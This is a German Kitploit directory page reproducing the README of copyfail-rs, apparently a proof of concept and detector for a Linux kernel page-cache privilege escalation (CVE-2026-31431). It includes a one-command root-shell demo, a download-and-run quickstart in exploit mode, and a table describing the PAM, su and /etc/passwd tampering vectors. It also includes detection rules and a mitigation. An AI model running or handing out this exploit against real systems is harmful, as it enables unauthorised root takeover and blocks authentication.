Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
copyfail-rs — CopyFail (CVE-2026-31431): Linux-Kernel-Page-Cache-PrivEsc-PoC + das einzige öffentliche Erkennungstool. Neuartiger PAM-Auth-Bypass-Vektor + Sigma/auditd/eBPF-Regeln. | Kitploit
Tools/GitHubGitHub/diemoeve/copyfail-rs
Privilege EscalationSchwachstellenanalyseExploitation
GitHubdiemoeve/copyfail-rs

copyfail-rs

CopyFail (CVE-2026-31431): Linux-Kernel-Page-Cache-PrivEsc-PoC + das einzige öffentliche Erkennungstool. Neuartiger PAM-Auth-Bypass-Vektor + Sigma/auditd/eBPF-Regeln.

Repository anzeigen
1733vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

copyfail-rs

Multi-Vektor-PoC + gepaarte Erkennung für CVE-2026-31431 (CopyFail). Enthält einen neuartigen PAM-Auth-Bypass-Vektor, den kein anderer öffentlicher PoC mitliefert. Der Erkennungsmodus erfasst, was AIDE / Wazuh / OSSEC / Tripwire strukturell nicht können.

Einzelne statische Binärdatei. ~108 KB. no_std musl.

Demo

root@kitploit:~
noot@host:~$ ./copyfail-rs --mode exploit
[sudo] password for noot:
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)
root@host:~#

Ein Befehl. Root-Shell. PAM-Killshot unter der Haube (ein einzelner 4-Byte-Schreibzugriff auf /etc/pam.d/common-auth), PTY-Abstieg in Root über sudo mit verworfenem Passwort. Die Zeile [sudo] password for noot: erscheint kurz aufblitzend; sudo gibt diese Eingabeaufforderung immer aus; die Binärdatei füttert sie mit einer beliebigen Zeichenkette und der Fehler von pam_unix kaskadiert durch das auskommentierte pam_deny.so zu pam_permit.so → root.

root@kitploit:~
$ ./copyfail-rs --mode detect --scan
=== copyfail-rs detection: --scan ===

TAMPERED (1):
  /etc/pam.d/common-auth [ext4]
    cache:  23c4f1ee...  ← was tatsächlich geladen ist (mutiert)
    disk:   117dab1c...  ← was AIDE / Wazuh / Tripwire sehen (sauber)

Das ist das Projekt. Disk sauber, Cache mutiert. Jedes öffentliche FIM ist blind. Dieses Tool nicht.

Schnellstart (kein Build nötig)

Vorgefertigte statische Binärdateien im v0.1.0-Release. Architektur wählen, herunterladen, ausführen.

root@kitploit:~
# x86_64 (die meisten Laptops + Cloud-Server)
curl -LO https://github.com/diemoeve/copyfail-rs/releases/download/v0.1.0/copyfail-x86_64-musl
chmod +x copyfail-x86_64-musl
./copyfail-x86_64-musl --mode exploit

Andere Architekturen:

ArchDatei
ARM64 (aarch64)copyfail-aarch64-musl
ARMv7 (Raspberry Pi 3+)copyfail-armv7-musleabihf

Integrität prüfen:

root@kitploit:~
curl -LO https://github.com/diemoeve/copyfail-rs/releases/download/v0.1.0/checksums.txt
sha256sum -c checksums.txt

Statische musl-Binärdateien, keine Laufzeitabhängigkeiten, läuft auf jedem Linux.

Warum FIM blind ist

Page-Cache-Mutation. Kein VFS-Schreibzugriff. Keine Dirty Page. Kein inotify-Ereignis. Periodischer Rescan konkurriert mit der Verdrängung.

AIDE/Wazuh/OSSEC/Tripwire/Samhain lesen über gepuffertes I/O → Page Cache → hashen mutierte Bytes als Wahrheit. Oder nach der Verdrängung hashen sie die saubere Disk → „es hat sich nie etwas geändert."

Erkennung benötigt O_DIRECT (Cache überspringen) + gepuffertes Lesen (Cache treffen) + Hash-Differenz. Abweichung = CopyFail-Signatur. Das ist --scan.

Vektoren

Automatische Auswahl: --vector auto (Standard). Reiht pam > su > passwd nach Tarnung. Fällt bei Fehler zurück.

Erkennung

--json überall für SIEM-Ingest.

Erkennungsartefakte

detection/:

  • sigma/copyfail-af-alg.yml, Sigma-Regel, in Ihr SIEM einspielbar
  • auditd/copyfail.rules, augenrules --load
  • ebpf/copyfail-trace.bt, bpftrace-Einzeiler
  • apparmor/copyfail-block.profile, AppArmor-3.0+-Deny-Regel
  • mitigation/disable-algif.sh, modprobe-Blacklist + =y-Warnung

Mitigation

root@kitploit:~
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf
sudo rmmod algif_aead

Oder Kernel-Mainline a664bf3d603d (April 2026). Stand jetzt: nur Debian Sid/Forky ausgeliefert. Ubuntu LTS, RHEL, SUSE, Amazon Linux, Fedora, Arch, Oracle = alle verwundbar.

Einschränkung: CONFIG_CRYPTO_USER_API_AEAD=y (eingebaut) umgeht modprobe stillschweigend. --check warnt.

Nach Exploit + Mitigation: Die Cache-Mutation bleibt bis zum Neustart bestehen. Mitigation blockiert NEUE Exploits, macht vergangene nicht rückgängig.

Build

root@kitploit:~
cargo build --release --target x86_64-unknown-linux-musl
ZielGröße
x86_64-musl108 KB
aarch64-musl96 KB
armv7-musleabihf86 KB

no_std. Kein Allocator. Keine Laufzeitabhängigkeiten. Einzelne statische Binärdatei.

Vorgefertigte Artefakte und SHA256-Summen sind an GitHub-Releases angehängt.

Verwendung

Siehe docs/usage.md für konkrete einbildschirmgroße Beispiele pro Modus (exploit auto/list/all, detect check/scan/baseline/diff/watch/hunt).

Für eine längere erzählerische Version dieser README (mehr Kontext, tiefere Ausführung), siehe BLOG.md.

Bedrohungsmodell

Siehe docs/threat-model.md.

Vergleich

Autorisierung & Ethik

Nur eigene Hardware. Kein CLI-Gate (Sicherheitstheater). README + LICENSE = der Rahmen.

Der Erkennungsmodus ist schreibgeschützt. Sicher für die Produktion.

Der Exploit-Modus mutiert den Kernel-Page-Cache. Nur-RAM, aber als destruktiv behandeln. Blockiert die Authentifizierung für jeden nachfolgenden Aufrufer.

Credits

CVE-2026-31431 offengelegt von Theori / Xint am 2026-04-29 (Writeup, Xint-Blog). Frühere öffentliche PoCs:

  • theori-io/copy-fail-CVE-2026-31431 (Python, 732 Bytes, su-Vektor)
  • tgies/copy-fail-c (C mit nolibc, su + passwd-Vektoren, portabel)
  • badsectorlabs/copyfail-go (statische Go-Binärdatei, su-Vektor)

Dieses Projekt (copyfail-rs): fügt den PAM-Auth-Bypass-Vektor, duale Modus-Erkennung, IR-Artefakte hinzu.

Lizenz

MIT.

Referenzen

  • https://copy.fail/
  • Linux-Fix: a664bf3d603d
  • Floor: 72548b093ee3 (4.14, Aug 2017)
  • Analog: Dirty Pipe (CVE-2022-0847)
Tool herunterladen
VektorZielWo es landet
pam (NEU)/etc/pam.d/common-auth (Debian/Ubuntu) oder system-auth (Fedora/RHEL/Arch)4 Bytes. auth requisite pam_deny.so → #aut requisite pam_deny.so. Sudo mit beliebigem Passwort = root.
su/usr/bin/suMutiert den Text der setuid-Binärdatei. execve → root.
passwd/etc/passwdUID-Flip → Benutzer wird beim nächsten Login root. Bricht SSH für diesen Benutzer.
ModusWas
--checkKernel + Modul + CONFIG_CRYPTO_USER_API_AEAD + Mitigationsstatus. Urteil: verwundbar / mitigiert / sicher.
--scanO_DIRECT- vs. gepufferter Lese-Diff auf kritischen Dateien. statfs()-verzweigt: ext4/xfs/btrfs verwenden O_DIRECT, overlayfs fällt zurück, tmpfs wird übersprungen.
--baseline / --diffSnapshot des bekannten sauberen Zustands. Später diffen. Nur-Cache-Deltas = der CopyFail-Fingerabdruck.
--watchDaemon. Periodischer Scan. SIGTERM sauber.
--huntSSH-Flotten-Sweep. JSON-Aggregate.
Theori Pythontgies Cbadsectorlabs Gocopyfail-rs
Vektorensusu + passwdsusu + passwd + PAM (neu)
Erkennungkeinekeinekeinevollständiger --mode detect
IR-ArtefaktekeinekeinekeineSigma + auditd + eBPF + AppArmor
Operator-UX3 Befehle4 Befehle5 Befehle1 Befehl
Binärdateibenötigt Python~10 KB~5 MB~108 KB statisch